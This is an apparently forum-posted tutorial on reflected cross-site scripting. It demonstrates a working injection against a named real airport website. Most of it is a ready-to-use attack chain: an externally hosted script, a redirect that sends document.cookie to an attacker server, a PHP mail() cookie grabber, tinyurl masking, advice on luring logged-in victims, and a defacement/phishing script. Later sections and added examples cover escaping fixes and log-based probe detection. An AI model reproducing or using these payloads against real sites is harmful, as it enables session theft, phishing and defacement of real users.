Finding a website vulnerable to XSS is not very difficult.
In most cases you can type this into the site's search box:

Code:
"><script>alert('try_xss');</script>

This script does nothing more than pop an alert box on the screen; if you see the alert, it means the script was reflected into the page.

Now we try to write:

Code:

"><script>alert('document.cookie');</script>
or
"><script>alert(document.cookie);</script>

If this XSS works, the alert on the screen will show our session cookies for the site.

Or, if it did not run, just look at the URL that was generated and see how it is built:

Example:

The latest XSS I have discovered is on the “aeroporto di Puglia” website:

http://www.seap-puglia.it/

If we search for "><script>alert('try_xss');</script> nothing happens.
But now look at the URL:

Link:

http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1=%22%3E%3Cscript%3Ealert(‘try_xss’);%3C/script%3E&strRicerca2=&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0

We find the variable that carries the search term, in this case strRicerca1.

Then we put the alert code directly in that variable:

Link:

http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script>alert('try_xss');</script>

The alert magically appears.

Now we try to write:

Link:

http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script>alert(document.cookie);</script>

Perfect! We see our cookie!
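From the defender's side, the URL above is exactly what ends up in the web server's access log, with the search term still percent-encoded as in the link. As an added example (not code from this post; the request lines are constructed from the URLs shown in it, not taken from a real log), this PHP snippet decodes the query string the way the application would and flags any parameter whose decoded value contains HTML, which is a simple way to spot reflected-XSS probes against a page like default.asp before or after the fix is deployed.

```php
<?php
// Added example, not the post's code: flag request URIs whose decoded
// query parameters carry HTML. The lines below are constructed from the
// URLs in this post; they are not real server logs.
declare(strict_types=1);

$sample_requests = [
    '/default.asp?rif=1&tiporicerca=2&strRicerca1=%22%3E%3Cscript%3Ealert(%27try_xss%27);%3C/script%3E&strRicerca2=&sel1=AND',
    '/default.asp?rif=1&tiporicerca=2&strRicerca1=voli+bari&strRicerca2=',
    '/page.php?variable=%22%3E%3Cscript+src%3D%22http://www.googlebig.com/cookiescript.js%22%3E%3C/script%3E',
    '/default.asp?rif=1',
];

// Return the names of the query parameters whose decoded value looks
// like HTML (a tag opener such as <script, </..., <!--). parse_str()
// percent-decodes and turns '+' into a space, so the check runs on what
// the application sees rather than on the raw log text.
function suspicious_params(string $request_uri): array
{
    $query = parse_url($request_uri, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return [];
    }
    parse_str($query, $params);
    $hits = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue; // array-valued parameters (a[]=1) are skipped here
        }
        if (preg_match('/<\s*[a-z\/!]/i', $value) === 1) {
            $hits[] = (string) $name;
        }
    }
    return $hits;
}

// Triage a batch of request URIs: one report row per request.
function triage(array $requests): array
{
    $report = [];
    foreach ($requests as $uri) {
        $hits = suspicious_params($uri);
        $report[] = [
            'uri'     => $uri,
            'params'  => $hits,
            'verdict' => $hits ? 'XSS-PROBE' : 'ok',
        ];
    }
    return $report;
}

if (PHP_SAPI === 'cli') {
    foreach (triage($sample_requests) as $row) {
        printf("%-10s %-14s %s\n", $row['verdict'], implode(',', $row['params']), $row['uri']);
    }
}
```

Run it with php on the command line: the first and third constructed requests are reported with the offending parameter name (strRicerca1 and variable), the two ordinary searches are reported as ok. The regex is deliberately generic (any tag opener) rather than a list of known payload strings, so it does not depend on the exact script the post uses.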

At this point we need the victim's cookie, and this is where a “cookie grabber” comes in. A cookie grabber is a script hosted on our server and included in the site's URL so that the victim's browser sends us the cookies directly 😀

If we want to include a JavaScript file we can write:

Code:

"><script src="http://www.googlebig.com/cookiescript.js"></script>

Inside the file cookiescript.js we write code that reads the cookie and sends it to us by e-mail.

First of all we need a redirect to our site that carries the cookie in a variable, so we write:

Code:
<script>location.href="http://googlebig.com/cookie.php?cookie="+document.cookie;</script>

Now we create cookie.php:

Code:
<?php mail("admin@googlebig.com", "Here's the cookie stolen", $_GET['cookie']); ?>

Now we upload cookie.php and cookiescript.js to our server and then go to:

Code:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script src="http://www.googlebig.com/cookiescript.js"></script>

If everything works we will receive the cookie by e-mail.

Now we send the link to the victim. We can send the full link or use a redirect service like http://www.tinyurl.com

Once the redirect is created (in this case http://tinyurl.com/2rgry5), we can contact the user, preferably through the same site, to make sure they open the link while they are logged in.

XSS THAT DOESN'T WORK

If an XSS does not work for a redirect or for displaying cookies, it can still be used as a phishing page.

An example of such code is:

Code JavaScript:
var title = "XSSED BY GOOGLEBIG.COM";
var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here ;)";
var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);

function deface(pageTitle, bgColor, imageUrl, pageText, fontColor)
{
    document.title = pageTitle;
    document.body.innerHTML = '';
    document.bgColor = bgColor;
    var overLay = document.createElement("div");
    overLay.style.textAlign = 'center';
    document.body.appendChild(overLay);
    var txt = document.createElement("p");
    txt.style.font = 'normal normal bold 36px Verdana';
    txt.style.color = fontColor;
    txt.innerHTML = pageText;
    overLay.appendChild(txt);
    // use the parameter, not the global, so the function works on its own
    if (imageUrl != "") {
        var newImg = document.createElement("img");
        newImg.setAttribute("border", '0');
        newImg.setAttribute("src", imageUrl);
        overLay.appendChild(newImg);
    }
    var footer = document.createElement("p");
    footer.style.font = 'italic normal normal 12px Arial';
    footer.style.color = '#DDDDDD';
    footer.innerHTML = pageTitle;
    overLay.appendChild(footer);
}

This code must be loaded in this way:

Code:

http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>

In this way the page runs the JavaScript we created.

Even in this case we can rely on tinyurl to mask our complete URL and redirect directly:

Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>

Another way to bring the victim to the page we want is this:

Code:
http://[Sitevictim]/page.php?variable="><script>location.href="http://www.googlebig.com/fakepage.htm";</script>

To fix cross-site scripting we have to use one of three PHP functions.

These functions neutralise the HTML tags, so it is no longer possible to inject into the page.

The most used one is htmlspecialchars(), which converts the characters "<" and ">" into "&lt;" and "&gt;".

Another option is htmlentities(), which replaces all applicable characters with their corresponding HTML entities.

Code PHP:
<?php
// This page shows an example
// of the differences in output between the 2 functions
$input = '<script>alert(1);</script>';
echo htmlspecialchars($input) . '<br />';
echo htmlentities($input);
?>
  • An example of htmlentities()
Code PHP:
<?php
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
echo htmlentities($str, ENT_QUOTES);
?>

The first prints: A 'quote' is &lt;b&gt;bold&lt;/b&gt;
The second prints: A &#039;quote&#039; is &lt;b&gt;bold&lt;/b&gt;

  • An example of htmlspecialchars()
Code PHP:
<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new;
?>

This prints: &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
The function strip_tags(), instead, removes all HTML elements except the ones you explicitly allow, such as <i>, <b> or <p>.

  • An example of strip_tags()
Code PHP:
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> Other text';
echo strip_tags($text);
echo "\n";
// allow <p>
echo strip_tags($text, '<p>');
?>

Now that we know these functions exist, we apply them in the code whenever we find an XSS in our web application.

I have recently found an XSS on my website, in the Video section of GoogleBig, which is a plugin for the MyBB forum. I have included a piece of the code to give an idea of how I applied the function to fix the search bug.

First of all I found the PHP page in question: search.php

Now let's look at the portion of code that performs the search, runs the query and outputs its result:

Code PHP:
function search($query, $page)
{
    global $db, $bgcolor2, $bgcolor4, $sitename, $io_db, $module_url, $list_page_items, $hm_index;
    $option = trim($option);
    $query = trim($query);
    $query = FixQuotes(nl2br(filter_text($query)));
    $db->escape_string($query);
    $db->escape_string($option);
    alpha_search($query);
    ...

In this case the variable that carries the value is $query, so we apply the function htmlentities():

Code PHP:
$query = FixQuotes(nl2br(filter_text(htmlentities($query))));
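As an added example (it is not the post's code nor the GoogleBig plugin's; the parameter name strRicerca1 and a UTF-8 page are assumptions), here is the search-page pattern from this post written twice: once echoing the term raw into the page, as the vulnerable site did, and once with htmlspecialchars() applied at output time. Two points the fix above leaves implicit: ENT_QUOTES is needed whenever the value lands inside an attribute, since the break-out in this post starts by closing a quoted value, and encoding at output rather than before the database call keeps the stored search term intact and avoids double-encoding when the same string is rendered again. Note also that if the plugin's $db->escape_string() returns the escaped string, as MyBB's does, rather than modifying its argument, its result has to be assigned back to $query for the escaping to take effect.

```php
<?php
// Added example (not the GoogleBig plugin's code): the search page
// pattern from this post, written twice. The hostile input is the same
// test string the post uses, so the difference in output is visible.
declare(strict_types=1);

// Constructed sample: the search string from the post.
$payload = "\"><script>alert('try_xss');</script>";

// Vulnerable: the search term is echoed raw into an attribute and into
// the page body, which is exactly what lets the "> break-out work.
function render_search_vulnerable(string $term): string
{
    return '<input type="text" name="strRicerca1" value="' . $term . '">'
         . '<p>Results for: ' . $term . '</p>';
}

// Encode for an HTML text node or a quoted attribute. ENT_QUOTES is
// required: without it single quotes pass through untouched. The charset
// is given explicitly because older PHP defaults are not always UTF-8.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Hardened: same markup, but every interpolation goes through h().
// The raw value can still be stored and searched; encoding happens only
// at output, so the database sees the user's real text.
function render_search_safe(string $term): string
{
    return '<input type="text" name="strRicerca1" value="' . h($term) . '">'
         . '<p>Results for: ' . h($term) . '</p>';
}

// strip_tags() with an allow-list, as in the post's third example: fine
// for a body that may legitimately contain <b> or <p>, but not a
// substitute for h() inside an attribute, because it leaves quotes alone.
function clean_body(string $s, string $allowed = '<b><i><p>'): string
{
    return strip_tags($s, $allowed);
}

// Self-check: a live <script> opener must never survive hardened output.
function contains_live_tag(string $html, string $tag = 'script'): bool
{
    return stripos($html, '<' . $tag) !== false;
}

if (PHP_SAPI === 'cli') {
    $bad  = render_search_vulnerable($payload);
    $good = render_search_safe($payload);
    echo "vulnerable: ", $bad, "\n";
    echo "hardened:   ", $good, "\n";
    echo "live <script> in vulnerable output: ", contains_live_tag($bad) ? 'yes' : 'no', "\n";
    echo "live <script> in hardened output:   ", contains_live_tag($good) ? 'yes' : 'no', "\n";
    echo "strip_tags with allow-list: ", clean_body('<p>hi</p><script>x</script>'), "\n";
}
```

Running it from the command line prints the vulnerable markup with an open <script> element inside the input's value attribute, the hardened markup with the same text rendered as &quot;&gt;&lt;script&gt;..., and a yes/no self-check for each. The h() helper is the single place to change if the page's charset or the required flags ever differ.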

If you have problems you can post here, or consult the manuals for the three PHP functions we saw:

http://php.net/htmlentities
http://php.net/htmlspecialchars
http://php.net/strip_tags

This guide was created for information purposes only.

If you have found an XSS you should post it at http://www.xssed.com/submit and you must contact the vulnerable site's admin.

My Xssed websites: http://xssed.com/archive/author=Langy/
